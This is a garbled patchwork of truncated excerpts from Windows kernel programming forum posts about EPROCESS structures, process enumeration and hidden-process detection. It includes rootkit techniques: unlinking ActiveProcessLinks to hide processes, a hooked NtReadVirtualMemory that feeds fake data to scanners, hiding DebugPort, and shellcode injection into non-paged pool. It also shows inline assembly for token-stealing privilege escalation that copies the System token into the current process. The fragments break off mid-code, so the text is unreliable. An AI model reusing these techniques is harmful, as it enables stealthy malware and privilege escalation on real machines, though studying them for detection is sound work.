It is relatively simple to get the modules loaded by a process from ring 3 (R3): the ToolHelp32 library API returns the modules associated with a process directly. But since this code is meant to run in ring 0 (R0), calling an R3 API makes no sense. So here I will describe part of how to reach a process's loaded modules under R0 through the EPROCESS structure. First, the general idea of the query:
Searching Google, I found that many implementations obtain the SYSTEM_PROCESS_INFORMATION structure directly through ZwQuerySystemInformation (the 11th one), which is not enough to express detailed process information. So I want to use this to look at the detailed EPROCESS structure. It can be obtained through the function PsLookupProcessByProcessId. The function prototype is given below.
typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG
The previous article's way of taking the path under XP was too troublesome.
Since the offset is fixed on the XP system, why not hard-code it?
All right, here we go ~~~
PFILE_OBJECT __declspec(naked) __stdcall _MmGetFileObjectForSection(PVOID Section)
{
__asm
{
Author: sinister
Information Source: whitecell
Email: sinister@whitecell.org
Homepage: http://www.whitecell.org
Date: 2005-11-16
2005-2-15
As we all know, the NT kernel runs in a preemptive multitasking mode. On a non-SMP system, each process is assigned its own CPU time slice in which to execute, so it looks like multiple tasks are running at the same time. The NT kernel also takes thread scheduling as its core, so thread switching means switching of the cu
Manipulating processes in the kernel. I believe manipulating processes in the kernel is the first point of knowledge that many friends interested in Windows kernel programming want to learn. But here I have to let everyone down: manipulating processes in the kernel is nothing special; in terms of the standard method, it still calls the process-related Native API (of course, the process operations this article refers to also include operations on threads and DLL modules). This article consists of 10 pa
reduces the IRQL (interrupt request level).
We pass NonPagedPool as the parameter to ExAllocatePool, copy the shellcode into the non-paged area, and then simply execute a JMP instruction to that memory region. Now all the code can execute safely without being affected.
When injecting drivers, we must be aware of the current IRQL. The IRQL is the current hardware priority of a given piece of kernel code. Many kernel routines require IRQL PASSIVE (0). If it runs at DISPATCH (2) level (used for pr
Title: [original] Hide your DebugPort in ring0
Author: wowelf
Time: 2009-01-26, 11:00:30
Chain: http://bbs.pediy.com/showthread.php?t=80971
When a program is debugged by a ring3 debugger, many debugging features can be detected; this forum also has a dedicated post with the details. However, there is a very fundamental identifier that few people can detect from ring3, namely _EPROCESS.DebugPort. DebugPort is very important for the ring3 debugger. Without its
. Get the thread ID through PsGetCurrentThreadId. Note that this thread is not the thread to be created, but the thread that contains the code that creates the thread.
The code then calls an undocumented function, PsLookupProcessByProcessId, to obtain the EPROCESS structure of a process. The EPROCESS structure is described in detail in w2kundoc.inc, which ships with KmdKit; the process name is saved in the
: IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG BufferLength, OUT PULONG ReturnLength OPTIONAL
Function: hide the memory of the protected module; if a scan of this block of memory is detected, return encrypted data to disrupt the scanning process.
Return: NTSTATUS
--*/
NTSTATUS MyNtReadVirtualMemory(IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG BufferLength, OUT PULONG ReturnLength OPTIONAL)
{
NTSTATUS status;
PEPROCESS eprocess;
PVOID peb;
PPEB_LDR_DATA pebldrda
handle table; step by step, development is gradually becoming more powerful. Some techniques and methods are beginning to emerge and become popular, such as FUTo and phide_ex......
The method for checking and detecting hidden processes can combine several popular approaches. First, you can scan the process active linked list, ActiveProcessLinks, in the EPROCESS structure; you can also use the HANDLE_TABLE and the HandleTableList linked
)
mov eax, [eax]
mov esi, [eax + 0x220]
mov eax, esi
SearchXP:
mov eax, [eax + 0x88]
sub eax, 0x88
mov edx, [eax + 0x84]
cmp edx, 0x4 // the PID is used to find the System process
jne SearchXP
mov eax, [eax + 0xc8] // get the token of the System process
mov [esi + 0xc8], eax // modify the token of the current process
ret 8
}
}
if (osversioninfo.dwMinorVersion == 2) {
__asm {
nop
nop
nop
nop
nop
nop
mov eax, 0xffdff124 // eax = KPCR (not 3G mode)
mov eax, [eax]
mov esi, [eax + 0x218]
mov eax, esi
Search2003:
M
Hidden process and recovery (with code) and process code
First, we know that the process body, EPROCESS, is maintained by the system in a doubly linked list (LIST_ENTRY). Therefore, we only need to remove the process's EPROCESS from this linked list to implement process hiding; of course, this only hides it from the process manager and ZwQuerySystemInformation. A process hidden by unlinking can still be foun
PspCidTable holds all process and thread objects in the system, indexed by either the process ID (PID) or the thread ID (TID). Let's look at the HANDLE_TABLE structure in WinDbg first: you can see that the content stored at address 0x83f41bc4 is 0x8da010a8, which is the system's _HANDLE_TABLE structure. Well, WinDbg has now located the HANDLE_TABLE structure; in code, the implementation here simply adds an offset: EPROCESS address of the System process PEPROCESS
(*PCREATE_PROCESS_NOTIFY_ROUTINE)(IN HANDLE ParentId, IN HANDLE ProcessId, IN BOOLEAN Create);
NTSTATUS PsSetCreateThreadNotifyRoutine(IN PCREATE_THREAD_NOTIFY_ROUTINE NotifyRoutine);
VOID (*PCREATE_THREAD_NOTIFY_ROUTINE)(IN HANDLE ProcessId, IN HANDLE ThreadId, IN BOOLEAN Create);
The prototypes show that the callback function only provides the process ID/thread ID, not the process name. So we need to further obtain the process name from the process ID. This requires an undocumented f
Author: bzhkl
Time: 2008-12-11, 12:01
Chain: http://bbs.pediy.com/showthread.php?t=78464
Previously, I tried to detect a hidden process and then solved it with the method of brute-force enumeration. But I did not see complete code for the SwapContext hook. So I collected some useful modules on the Internet and integrated them to implement support. XP3; XP2 should also be supported, even though it is not tested.
Complete project code
Difficulty: there are still some details about obtaining the swapcontext ad
process. The information we need to find is a pointer to the EPROCESS structure. The EPROCESS structure is the main kernel data structure used to represent a process. You can see the information the EPROCESS structure contains with "dt _EPROCESS" (dump type). To find the
Recently, while learning kernel programming, I am recording my recent study notes.
Principle: remove the current process from the linked list of EPROCESS structures.
Can't be! Process 0 0 See
#include "HideProcess.h"
#ifdef WIN64
#define ActiveProcessLinks_EPROCESS 0x188
#define ImageFileName_EPROCESS 0x2e0 // a 16-byte character array
#else
#define ActiveProcessLinks_EPROCESS 0x088
#define ImageFileName_EPROCESS 0x174 // a 16-byte character array
#endif
NTSTATUS DriverEntry(PDRIVER_OBJEC